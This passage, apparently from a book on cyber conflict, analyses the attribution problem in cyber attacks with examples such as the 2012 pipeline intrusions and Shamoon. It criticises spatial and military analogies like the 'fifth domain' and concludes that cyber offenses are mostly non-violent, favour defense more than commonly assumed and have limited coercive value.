A second example happened about a year later. In May 2012, an attempted attack on American natural gas pipelines was discovered. The Department of Homeland Security, in charge of protecting the country’s critical infrastructure, made it publicly known that the attacks were ongoing. The department’s Industrial Control Systems Cyber Emergency Response Team said that its experts had identified a live campaign of intrusions. The ICS-CERT, as the response team is known, had contacted natural gas and oil pipeline operators in order to help them recognize the attacks. Attackers had used a tried and tested method to trick employees at those companies into opening infected attachments or clicking on infected links. In quite sophisticated spear-phishing attacks, the attackers had managed to send fake emails purportedly from colleagues. The attacks did not target the actual control systems, and did not cause any damage to the pipelines. Yet the wider purpose of the attacks remained unclear. The operators voiced their concern through an industry group. “These intrusions are reconnaissance,” said Cathy Landry from the Interstate Natural Gas Association of America, “But we don’t know if they are trying to get into the pipeline control system, or into company information.” 45

To appreciate the true significance of the attribution problem, the other perspective has to be considered in turn. The other perspective is the perspective of the attacker. The targeted party nearly always has an interest in attributing violent action to its agent—but the situation is more complex for the offender. An offensive actor may have one of four interests in attributing a cyber attack: avoiding attribution; message attribution; full attribution; or false attribution. The four will be briefly considered in turn.

The first and often very likely scenario is that an attacker attempts to avoid attribution: in the vast majority of cases of cyber espionage, spies simply want to avoid all attribution. All cases discussed above under espionage have this trait in common. Avoiding attribution is also likely to be in the interest of professional saboteurs, where the act of sabotage itself—Stuxnet is the prime example—carries its own implicit message that does not need to be explicitly explained to the target.

This may be different in the second scenario, message attribution. If an attacker or a group of attackers wants to use a cyber attack, for instance a Denial of Service Attack, as a vehicle to make a political statement, then this statement almost always requires some sort of explanation. Military as well as militant action, generally speaking, requires an explanation. The perpetrators of a terrorist bombing, for instance, usually follow up with a communiqué that explains the rationale of the offense. Something similar applies in the case of some cyber attacks. The Shamoon incident, the hacking attack against Saudi Aramco on 15 August 2012, illustrates the messaging requirement. A new entity, The Cutting Sword of Justice, successfully claimed credit for the attack. On the same day that the attack became public, a user by the default name of “A Guest” published a communiqué by simply posting it to Pastebin, an Internet platform used to publicize text anonymously by copying-and-pasting it there. The message contained information that had not been in the public domain at this point in time: the number of compromised computers as well as the precise kill time of the malware. Both were later confirmed separately by Saudi Aramco and Symantec. These confirmed facts in turn established the credibility of the anonymously posted communiqué, thus attaching a political message to the mysterious attack. The attackers, in other words, succeeded in four ways: infiltrating the target, engaging the target, attaching a message to the attack, and at the same time remaining anonymous. The attackers thus divorced the main cost of attribution from the main benefit: suffering consequences as a result of making an identifiable political statement.

The third and perhaps the most interesting scenario is correct attribution. The attribution problem has a flipside for potential authors of offensive malware. Equipping an attack with an anonymous message is easy, but it may not be in the interest of the attacker if the stakes are high. An act of war, including a potential although unlikely act of cyber war, is an act of physical force to compel an actor to change their behavior. The notion that a powerful state actor would try to coerce another actor anonymously is highly unrealistic. The exception is covert operations in a proxy conflict or sabotaging machines in a covert operation of a mostly tactical nature. If the political stakes in a one-on-one confrontation are high enough, the offender will have an interest in taking credit for an attack—or, more likely, the attribution issue will retreat into the background in the heat of crisis.

A fourth scenario is false attribution. Martin Libicki, a cyber security analyst at the Rand Corporation in Washington, DC, pointed to the problematic incentive structure of cyber attacks that could be designed to get one state to “retaliate,” mistakenly, against another state or possibly non-state actor: “the more serious the threat of retaliation, the greater the incentive for false-flag operations on the part of the presumed attacker’s enemies.” 46 Verisign’s Eli Jellenc described the problem of “false-flags” as the mimicry problem and surmised that it could be even more serious than the attribution problem conventionally understood. 47 But deliberate false attribution remains highly speculative. The only empirical examples of false attribution are command-and-control servers routed through various third countries. An unusual form of false attribution is what may be called a false-credit ruse: falsely claiming a cyber attack where none had happened. Perhaps the only example is al-Qaeda’s inept and ridiculous claim to have caused the 2003 power blackout, as the Egyptian newspaper Dar al Hayat reported. 48

Several factors are likely to facilitate attribution. Firstly, it is helpful if the intruders make mistakes and unknowingly leave forensic evidence behind. Mahdi, discussed in an earlier chapter, is an example of a rather unprofessional execution. But some professional attackers may maintain the highest standards of operational security and not make mistakes. Secondly, knowing the motivation of a particular attack may limit the number of suspects, especially in political cyber attacks. GhostNet or Gauss are examples where the design and the target set of the attack point to a limited number of suspects (China and the United States, respectively). Thirdly, supporting evidence may be available, such as wiretaps or leaks of internal communication that shows a cyber attack was planned and authorized by a specific leader or manager, as in the Aurora follow-up of the US embassy in Beijing. 49 Fourthly, some attacks require a high degree of specialized and hard-to-get intelligence, for instance process knowledge about the control system installation in large oil refineries. The more specialized, the more expensive, and the more hard-to-get the intelligence required for such a strike, the smaller the circle of organizations able to acquire that intelligence. Finally, the most sophisticated military-grade cyber attacks are likely to be embedded in a broader campaign of covert or overt operations, as Stuxnet demonstrated. If cyber attacks merely precede or accompany conventional strikes, then the attribution problem steps into the background.

This analysis leads to a conclusion that is both sobering and comforting at the same time: the attribution problem is a function of an attack’s severity. Attributing political cyber attacks, if executed professionally and if unsupported by supplemental intelligence, is very hard if not impossible. Even if an attack can be traced to a particular state, and even if that state’s motivation to attack seems clear, the attribution problem’s technical, social, and political architecture gives the accused state sufficient deniability. The Aurora attack demonstrated such a scenario for the Chinese. Stuxnet demonstrated it for the United States and Israel. But because the attribution problem is a political problem, there is room for maneuver. Both Aurora and Stuxnet were high-profile attacks. But the sophistication and the impact of a cyber attack could be significantly higher, which leads to an important insight: the more damaging and the more violent an attack, the higher the political stakes. And the higher the political stakes, the more pressure the targeted country will be able to bring to bear on the country of the suspected origin to cooperate in a forensic investigation. Consider an Operation Aurora scenario on steroids: a highly sophisticated attack, but one that includes a trailblazing campaign of cyber attacks against US critical infrastructure, for instance a number of targeted Stuxnet-class intrusions into nuclear power plants resulting in damage to the reactors’ cooling mechanisms and possibly radioactive incidents that cause casualties and fatalities. Further consider that—as with the Aurora attacks—nobody took credit for the attack but its destructive design and the high-grade intelligence that enabled it limited the number of possible perpetrators; within weeks the NSA would be able to trace the origin to Chinese IP addresses at two educational establishments with links to the military. Such an attack may be extraordinarily unlikely, perhaps unfeasible—yet it is helpful to consider how a “cyber 9/11” would affect the attribution problem. The political situation in the wake of such an event would be extraordinary, and military retaliation would be a real option. In such a situation, two changes would be likely: first, the standards of attribution would be lowered, not to the unreasonable but to the realistic. These standards as well as the transparency of the evidence are already lower than in an American court trial, perhaps comparable with the far murkier intelligence that regularly supports covert operations and drone strikes in far-flung places. The second change would be that the burden of proof would shift to the suspect. If Chinese authorities denied their authorship without aggressively cooperating with US investigators, providing detailed log-files and all available forensic evidence that can lead the investigation a step closer to the perpetrators, either inside or outside China, then such a refusal of cooperation may be understood as a tacit admission of authorship; “we won’t tell you who did it” would simply translate into “we did it.” The attribution problem, in short, would most likely be resolved within a reasonable time frame in such an extreme situation. If cyber war takes place, the attribution problem will likely be solved. This is the argument’s comforting part. The sobering part is that this statement can be flipped on its head and turned into a weighty question: if cyber war will not take place, can the attribution problem ever be solved? The answer, as this chapter argued, entirely depends on the standards of proof that policy makers and the public are willing to accept as a sufficient basis for political action. Attribution is always a call of judgment.

Before moving on to conclusions, one subject needs to be moved out of the way. That subject has permeated this analysis—and it is a subject that pervades, if not distorts, many other publications on cyber security: analogies.

Analogies, similes, and metaphors have enabled and shaped the discussion of computers for many decades. As engineers developed new technologies, they needed new words to describe what they and their technology were doing. Storage and packets and firewalls are all spatial analogies that refer to something humans could intuitively relate to. Hard disks were a repository for lots of data, old and new, so referring to them as storage devices must have seemed intuitive. Small pieces of information, bundled between a header and footer with an address on it, naturally could be called a packet. Calling software that prevented unauthorized access a firewall just made sense. Pointing out that cyberspace itself is a spatial metaphor may be obvious. Less obvious is the fact that it was not an engineer who coined the term, but William Gibson, a novelist. Gibson first used the word in his 1982 science fiction story Burning Chrome. 1 He later popularized it in the 1984 novel Neuromancer. It is worth quoting the paragraph that introduced the word to the book’s readers. The segment describes the fictional thoughts of Henry Dorsett Case, a low-level drug dealer in the dystopian underworld of Chiba City, Japan:

A year here and he [Case] still dreamed of cyberspace, hope fading nightly. All the speed he took, all the turns he’d taken and the corners he’d cut in Night City, and still he’d see the matrix in his sleep, bright lattices of logic unfolding across the colorless void ... The Sprawl was a long strange way home over the Pacific now, and he was no console man, no cyberspace cowboy. Just another hustler, trying to make it through. 2

Cyberspace, for Gibson, was meant to evoke a digital virtual world of computer networks that users would be able to “jack” into through consoles. Cyberspace, Gibson later explained, was an “effective buzzword ... evocative and essentially meaningless.” The writer imagined the word as a suggestive term, one that had “no real semantic meaning.” 3 But probably not even the resourceful Gibson could have imagined a more spectacular rise of his evocative yet meaningless expression. To this day, this creative lack of semantic clarity remains a potent source of agility that helped the analogy jump out from the pages of an obscure sci-fi novel and “jack” cyberspace into the political reality of international relations and national security.

Yet analogies should be used with caution and skill, especially in the conceptual minefield that is cyber security. Analogies can be triply instructive. Firstly, a metaphor can make it easier to understand a problem—analogies are didactic devices (saying that cyber security is a conceptual minefield, as the opening sentence of this paragraph just did, makes one thing obvious: be careful, something can go wrong if you don’t pay attention to detail). Secondly, the comparisons that metaphors force upon us can highlight areas of importance and connections that might otherwise have been missed—analogies are inspirational and creative devices (if cyber security is a conceptual minefield, then perhaps we can come up with a way to better find the “mines”?). Finally, and most importantly, at some point a metaphor will begin to fail, and at this point of conceptual failure we may learn the most important things about the subject at hand, how it differs from the familiar, how it is unique—analogies are also testing devices. 4 This triple approach to evaluating the utility of metaphors is simple in concept but difficult in practice. Perhaps especially in the context of cyber security—a field which encompasses the technological knowledge of various subdisciplines of computer science as well as social science, political science, legal studies, and even history—each step on this three-bar ladder of abstraction by analogy requires progressively more specialized expertise.
Taking the first step is easy. Even laypersons may use analogies as didactic devices. Going to the second step is not too difficult. Using analogies as creative devices requires some working knowledge of a field but not special training. But using analogies as testing devices requires expertise and skill. Recognizing a complex analogy’s point of failure and taking advantage of the additional insights afforded by the conceptual limitations of a given metaphor takes expert knowledge, perhaps even knowledge from across unrelated disciplines and subdisciplines. In practice, therefore, analogies often begin to fail without their users noticing the defect. The short-sighted and flawed use of metaphors is especially prevalent in the cyber security debate, particularly, it seems, among experts in military affairs both in uniform and outside uniform. Talking about cyber war or cyber weapons, for instance, is didactically useful: the audience instantly has an idea of what cyber security could be about; it inspires creativity, perhaps evoking thoughts of “flying” or “maneuvering” in cyberspace, not unlike Henry Dorsett Case jacking in. But too often analogies are used without understanding or communicating their point of failure (if cyber security is a conceptual minefield, then stepping on one of the dangerous devices causes harm that cannot instantly be recognized). The line between using such comparisons as self-deception devices and testing devices, in other words, can be a subtle one.

A perfect illustration of this problem is the much-vaunted war in the ostensible fifth domain. “Warfare has entered the fifth domain: cyberspace,” The Economist intoned in July 2010. 5 Indeed, referring to cyber conflict as warfare in the fifth domain has become a standard expression in the debate. This author was taken aback in a closed-door meeting in the Department of War Studies at King’s College London in early 2012 when a senior lawyer for the International Committee of the Red Cross referred to cyber war and wondered whether the ICRC needed to work toward adapting the law of armed conflict to that new “fifth domain.” Five points will help clear the view. First: the expression of war in the fifth domain has its origin as a US Air Force lobbying gimmick. The Air Force had already been in charge of air and space, so cyberspace came naturally. In December 2005 the US Air Force expanded its mission accordingly. That alone is not a strong argument against the term’s utility, but it should be clear where the expression comes from, and what the original intention was: claiming a larger piece of a defense budget that would start to shrink at some point in the future. Second: ultimately, code-triggered violence will express itself in the other domains. Violence in cyberspace is always indirect, as chapter two discussed at length. By definition, violence that actually harms a human being cannot express itself in a fifth domain. Third, if warfare in the fifth domain, as consequently would be necessary, referred only to damaging, stealing, or deleting information stored in computer networks, rather than to affecting something that is not part of that domain in the first place, then the very notion of war would be diluted into a metaphor, as in the “war” on obesity. Fourth, cyberspace is not a separate domain of military activity. Instead the use of computer networks permeates all other domains of military conflict, land, sea, air, and space. To an extent, that has always been the case for the other domains as well. But in the case of IT security an institutional division of labor is far more difficult to implement, especially in a military context: the air force doesn’t have tanks, the army has no frigates, but everybody has computer-run command-and-control networks. Finally, cyberspace is not even space. Cyberspace is a now-common metaphor to describe the widening reaches of the Internet. “Firewall” and “surfing” the web are other well-established and widely accepted spatial metaphors. Saying the air force “flies” in cyberspace is like the army training troops to “scale” firewalls or the navy developing new “torpedoes” to hit some of those surfing the web. In fact the very idea of “flying, fighting, and winning ... in cyberspace,” enshrined in the US Air Force’s mission statement, is so ill-fitting that some serious observers can only find it faintly ridiculous—an organization that wields some of the world’s most terrifying and precise weapons should know better. The debate on national security and defense would be well served if debating war was cut back to the time-tested four domains. After all there is no cyber attack, not even the over-cited Stuxnet, which unequivocally represents an act of war on its own. No cyber offense has ever caused the loss of human life. No cyber offense has ever injured a person. No cyber attack has ever seriously damaged a building.

Once the distraction of the “fifth domain of warfare” is moved out of the way, five fundamental and largely novel conclusions become visible.

The first and main conclusion, and this book’s core argument, is that the rise of cyber offenses represents an attack on violence itself. Almost all cyber attacks on record are non-violent. Those cyber attacks that actually do have the potential to inflict physical violence on machines or humans can do so only indirectly, as chapter two argued in detail: so far, violence administered through cyberspace is less physical, less emotional, less symbolic, and less instrumental than more conventional uses of political violence. This applies in all three main areas where political cyber attacks appear: sabotage operations may be violent or, in the majority of cases on record, non-violent. The higher the technical development and the dependency of a society, the higher the potential for both violent and non-violent cyber sabotage. This has double significance: it is easier to distinguish between violence and non-violence, and it is more likely that saboteurs choose non-violence over violence. Espionage operations seem to be making less use of personnel trained in the management of violence than in the pre-Internet age. To an extent, experts in the use of code are replacing experts in the use of force, though only in relative terms and at a price. Finally, subversion has changed. The early phases of subversively undermining an established authority require less violence than before, but turning a budding subversive movement into a revolutionary success has become more difficult. Technology seems to have lowered the entry costs while raising the costs of success. Yet cyber attacks of all strands, even in their predominantly non-violent ways, may achieve a goal that previously required some form of political violence: to undermine the collective social trust in specific institutions, systems, organizations, or individuals. And cyber attacks, whether executed by a state or by non-state groups, may undermine social trust, paradoxically, in a more direct way than political violence: through a non-violent shortcut.

The second conclusion concerns the balance between defense and offense in the context of cyber attacks. Most conventional weapons may be used defensively and offensively. But the information age, the argument goes, has “offence-dominant attributes.” 6 A 2011 Pentagon report on cyberspace still stressed “the advantage currently enjoyed by the offense in cyberwarfare.” 7 Cyber attack, proponents of the offense-dominance school argue, increases the attacker’s opportunities and the amount of damage to be done while decreasing the risks (sending special code is easier than sending Special Forces). 8 The attribution problem unquestionably plays into the hands of the offense, not the defense. Hence expect more sabotage and more saboteurs.

But adherents of the offense-dominance ideology should reconsider their arguments, for three different reasons: one is that when it comes to cyber weapons, the offense has to deal with a set of costs and difficulties that the defense does not have to deal with. One implicit assumption of the offense-dominance school is that cyberspace favors the weak. But cyber attack may also favor strong and rich countries in unexpected ways: the Idaho National Laboratory, for instance, has many of the mainstream industrial control systems installed on range, in order to test them, find vulnerabilities, and build stronger defensive systems. But the same testing environment is also a tremendous offensive asset. By the time engineers have understood how to fix something, they also know how to break it. In addition to this, some installations are highly expensive to simulate and to install in a testing environment, for instance the control systems used in complex and highly bespoke refineries. At the same time only very few systems are used in refineries. This means that only a country that has this capability may be in a position to attack that capability elsewhere—this could limit the number of potential attackers. 9 Cyber sabotage with serious destructive potential is therefore possibly even more labor intensive than the brick-and-mortar kind, even if the required resources are dwarfed by the price of complex conventional weapon systems. 10 Vulnerabilities have to be identified before they can be exploited; complex industrial systems need to be understood first; and a sophisticated attack vehicle may be so fine-tuned to one specific target configuration that a generic use may become impracticable—consider a highly sophisticated rocket that can only be fired against one single building and at nothing else, and it can only be fired once the attacker knows precisely what’s inside that building. The target set of a cyber weapon is therefore more limited than commonly assumed—the reverse is true for robust defenses.

Another reason is that, when it comes to cyber weapons, the offense has a shorter half-life than the defense. 11 Clandestine attacks may have an unexpectedly long life-cycle, as Stuxnet and especially Flame illustrated. But weaponized code that is designed to maximize damage, not stealth, is likely to be more visible. If an act of cyber war was carried out to cause significant damage to property and people, then that attack would be highly visible by definition. As a result it is highly likely that the malicious code would be found and analyzed, probably even publicly by anti-virus companies and the software vendors that provide the attacked product. The exploits that enabled the attack would then most likely be patched and appropriate protections put in place. Yet political crises may stretch out for many weeks, months, or even years. Updated defenses would make it very difficult for the aggressor to repeat an attack. But any threat relies on the offender’s credibility to attack, or to repeat a successful attack. If a potent cyber weapon is launched successfully once, it is questionable if an attack, or even a salvo, could be repeated in order to achieve a political goal. The problem of repetition reduces the coercive utility of destructive cyber attacks.

The final factor favoring the defense is the market. One concern is that sophisticated malicious actors could resort to asymmetric methods, such as employing the services of criminal groups, rousing patriotic hackers, and potentially redeploying generic elements of known attack tools. Worse, more complex malware is likely to be structured in a modular fashion. Modular design could open up new business models for malware developers. In the car industry, for instance, 12 modularity translates into the possibility of a more sophisticated division of labor. Competitors can work simultaneously on different parts of a more complex system. Modules could be sold on underground markets. But even if this analysis is correct, emerging vulnerability markets pose a limited risk: the highly specific target information and programming design needed for potent weapons is unlikely to be traded generically. To go back to the imperfect analogy of chapter four: paintball pistols will continue to be commercially available, not intelligence-devouring preprogrammed warheads of virtual, one-shot smart missiles. At the same time the market on the defensive side is bullish: the competition between various computer security companies has heated up, red-teaming is steadily improving, active defense is emerging, and very slowly but notably consumers are becoming more security aware.

Once the arguments are added up, it appears that cyberspace does not favor the offense, but actually has advantages for the defense in stock. What follows may be a new trend: the level of sophistication required to find an opportunity and to stage a successful cyber sabotage operation is rising. The better the protective and defensive setup of complex systems, the more sophistication, the more resources, the more skills, the more specificity in design, and the more organization is required from the attacker. Only very few sophisticated strategic actors may be able to pull off large-scale sustained computer sabotage operations. A thorough conceptual analysis and a detailed examination of the empirical record corroborate one central hypothesis: developing and deploying potentially destructive cyber weapons against hardened targets will require significant resources, hard-to-get and highly specific target intelligence, and time to design, test, prepare, launch, execute, maintain, and assess an attack. Successfully attacking the most highly secured targets would probably require the resources or the support of a state actor; terrorists are unlikely culprits of an equally unlikely cyber-9/11.

The third conclusion is about the ethics of cyber attacks. If cyber attacks reduce the amount of violence inherent in conflict, rather than increase it, then this analysis opens a fresh viewpoint on some important ethical questions. Some observers have suggested creating an agreement like the Geneva Conventions to limit the use of weaponized code. 13 Often such demands reach back to comparisons to the Cold War and nuclear weapons. For example: Brent Scowcroft, a cold warrior who served presidents Gerald Ford and George H.W. Bush, addressed a group of experts and students at Georgetown University in March 2011. The Cold War and cyber security are “eerily similar,” said Scowcroft, arguing that the US-Soviet arms control treaties should serve as a blueprint for tackling cyber security challenges. “We came to realize nuclear weapons could destroy the world and cyber can destroy our society if it’s not controlled,” Scowcroft told his Georgetown audience. 14 Many views along similar lines could be added, and several academic articles have attempted to extract useful Cold War parallels. 15 Naturally, avoiding the “destruction of our society” at all costs appears as the ethically correct choice. Many observers naturally fall back into well-established patterns of thought: striving for an international treaty to stop the impending “cyber arms race” or trying to apply jus ad bellum to acts of war that have not taken place. 16 But lazy and loose comparisons cannot replace sober and serious analysis—nuclear analogies are almost always flawed, unhelpful, and technically misguided. 17

Once cyber attacks are broken down into their three strains, sounder ethical considerations become possible. Subversion is the most critical activity. It is probably impossible to find much common ground on this question between the United States and the European Union on the one hand and the authoritarian political regimes in Russia or China on the other—and it would be ethically unacceptable to make compromises. Russia and China have famously suggested finding such a compromise in the form of an “International code of conduct for information security,” laid out in a letter to the United Nations Secretary-General on 12 September 2011. One of the core tenets of this suggested code was “respect for sovereignty” online in order to “combat” criminal and terrorist activities that use the Internet. The goal: curbing the dissemination of information that incites extremism, secessionism, and “disturbance.” Unnerved by the web-driven Arab revolutions, China and Russia wanted to set the international stage for better counter-subversion at home, as became evident during the World Conference on International Telecommunications (WCIT) in Dubai, United Arab Emirates, in early December 2012.

Yet for liberal democracies, the most normatively crucial question is a very different one. The question is not how to curb subversion, but how to maintain the right forms of subversion that enable democratic as well as entrepreneurial self-renewal: how should a free and open liberal democracy draw and renegotiate the line between regenerative subversion, which is enshrined in the constitution of truly free countries, and illegal subversive activities? This fine line has evolved over hundreds of years in liberal democracies, along with the tacit understanding that at rare but important junctures illegal activity can be legitimate activity. This line will have to be carefully reconsidered under the pressure of new technologies that may be used to extend control as well as to protest and escape control. The real risk for liberal democracies is not that these technologies empower individuals more than the state; the long-term risk is that technology empowers the state more than individuals, thus threatening to upset a carefully calibrated balance of power between citizens and the governments they elect to serve them.

The ethics of sabotage look very different. Weaponized code, or cyber attacks more generally, may achieve goals that previously would have required the use of conventional force. This analysis has also argued that the most sophisticated cyber attacks are highly targeted, and that cyber weapons are unlikely to cause collateral damage in the same way as conventional weapons. Therefore, from an ethical point of view, the use of computer attack in many situations is clearly preferable to the use of conventional weapons: a cyber attack may be less violent, less traumatizing, and more limited. Sabotage through weaponized code, in short, is likely to be more ethical than an airstrike, a missile attack, or a Special Forces raid. Something comparable applies to the ethics of cyber espionage. Again the use of computer attack as a tool of statecraft has to be compared with its alternatives, not with taking no action at all. Juxtaposing the alternatives is useful: intelligence may be gained by infiltrating computer systems and intercepting digital signals—or intelligence may be acquired by infiltrating human spies into hostile territory at personal risk, possibly armed, or by interrogating suspects under harsh conditions. Depending on the case and its context, computer espionage may be the ethically safer choice. The major problems are not ethical, but operational. This leads to the next conclusion.

The fourth conclusion is the most sobering one—it concerns the starkly limiting subtext of stand-alone cyber attacks. 18 A state-sponsored cyber attack on another state sends a message in the subtext. The best-known and most successful example is Stuxnet. An assessment of this technically impressive operation has to be put into the larger strategic context: it was designed to slow and delay Iran’s nuclear enrichment program, and undermine the Iranian government’s trust in its ability to develop a nuclear weapon. Yet, firstly, it long remained unclear and controversial how successful the designers of Stuxnet were in this respect—it was probably clearer for the Iranians themselves. What is clear for outsiders, though, is that Stuxnet did not succeed in stopping Iran or denting the regime’s determination to develop a nuclear weapons capability. Several countries, secondly, pursued a number of policies vis-à-vis Iran in order to prevent the Islamic Republic from acquiring nuclear weapons. The instruments range from diplomacy, negotiations and sanctions of various sorts to covert operations, the assassination of nuclear scientists (and others), military threats, and ultimately to air strikes against key Iranian installations. Cyber attacks are only one instrument among many. Focusing on cyber attacks with questionable efficiency, and possibly with an AC/DC soundtrack, therefore runs the risk of sending a counterproductive message to the Iranians in the subtext: we’re alert and technically sophisticated, but we’re not really serious about attacking you if you cross a red line. A stand-alone cyber attack, especially done clandestinely and in a fashion that makes it impossible or nearly impossible to identify the attacker in situ, can be executed from a safe distance. Such an attack does not put the lives of service personnel at risk—therefore the political stakes are by definition lower than in a conventional operation. It is useful to remember the Cold War logic of the trip-wire here. Throughout the Cold War, substantial numbers of American ground forces were stationed in West Germany and elsewhere to make a credible statement to the Soviet Union in the subtext: we’re alert and technically sophisticated, and we’re really serious about attacking you if you cross a red line. 19 The White House credibly demonstrated its seriousness by putting the lives of American citizens on the line. Cyber attacks could yield very valuable intelligence, no doubt. But from a political vantage point their coercive utility is far more questionable. Based on the empirical record and on a technical analysis, the political instrumentality of cyber attacks has been starkly limited and is likely to remain starkly limited. Paradoxically this effect is enhanced by the wide gulf between hype and reality, as those at the receiving end of cyber sabotage hear a lot of noise but feel (comparatively) little pain. Put simply, cyber sabotage attacks are likely to be less efficient than commonly assumed.

The final conclusion is about the reaction, about countermeasures to cyber attacks. Senator John McCain commented on the failed Cybersecurity Act of 2012 over the summer that year. The prominent national security leader had voted against the proposed bill: “As I have said time and time again, the threat we face in the cyber domain is among the most significant and challenging threats of twenty-first-century warfare.” Early in 2013 the Pentagon announced that it would boost the staff of its Cyber Command from 900 to 4,900 people, mostly focused on the offense. The use of such martial symbolism points to a larger problem: the militarization of cyber security. 20 William Lynn, the Pentagon’s number two until October 2011, responded to critics by pointing out that the Department of Defense would not “militarize” cyberspace. “Indeed,” Lynn wrote, “establishing robust cyberdefenses no more militarizes cyberspace than having a navy militarizes the ocean.” 21 There is one major problem with such statements.

The US government, as well as many other governments, has so far failed to establish robust cyberdefenses. Robust defenses against sabotage mean hardening computer systems, especially the systems that are moving stuff around, from chemicals to trains—but the actual security standards of the systems that run the world’s industrial and critical infrastructure continued to be staggeringly low in 2013. Robust defenses against espionage mean avoiding large-scale exfiltration of sensitive data from companies and public agencies—but Western intelligence agencies are only beginning to understand counter-espionage and the right use of human informants in a digitized threat environment. Robust defenses against subversion finally mean maintaining social stability by strengthening the Internet’s openness and citizen participation in the political process—the best insurance against degenerative subversion is allowing and even protecting regenerative subversion. If militarizing cyberspace means establishing robust cyber defenses, then cyberspace has not been “militarized.” What has been militarized is the debate about cyberspace. One result is that the quality of this debate dropped, or, more accurately, never rose to the level that information societies in the twenty-first century deserve. This book has argued that this remarkable double-standard is not merely a coincidence. What appears as harmless hypocrisy masks a knotty causal relationship: loose talk of cyber war overhypes the offenses and blunts the defenses.

In the 1950s and 1960s, when Giraudoux’s play was translated into English, the world faced another problem that many thought was inevitable: nuclear exchange. Herman Kahn, Bill Kaufmann, and Albert Wohlstetter were told that nuclear war could not be discussed publicly, as Richard Clarke pointed out in his alarmist book, Cyber War. He rightly concluded that, as with nuclear security, there should be more public discussion on cyber security because so much of the work has been stamped secret. This criticism is justified and powerful: too often countries as well as companies do not share enough data on vulnerabilities as well as capabilities. Of course there are limits to transparency when national security and corporate revenue are at stake. But democratic countries deserve a public debate on cyber security that is far better informed than the status quo. Open systems, no matter whether we are talking about a computer’s operating system or a society’s political system, are more stable and run more securely. The stakes are too high to just muddle through.

The Pearl Harbor comparison and the Hiroshima analogy point to another limitation: unlike the nuclear theorists of the 1950s, cyber war theorists of the 2010s have never experienced the actual use of a deadly cyber weapon, let alone a devastating one like “Little Boy.” There was no and there is no Hiroshima of cyber war. Based on a careful evaluation of the empirical record, based on technical detail and trends, and based on the conceptual analysis presented here, a future cyber-Hiroshima must be considered highly unlikely. It is about time for the debate to leave the realm of myth and fairytale—to a degree, serious experts have already moved on, and the political debate in several countries is beginning to follow their lead. Cassandra, it is true, was right at the end and had the last word in the famous Greek myth. But then, did the Trojan War really take place?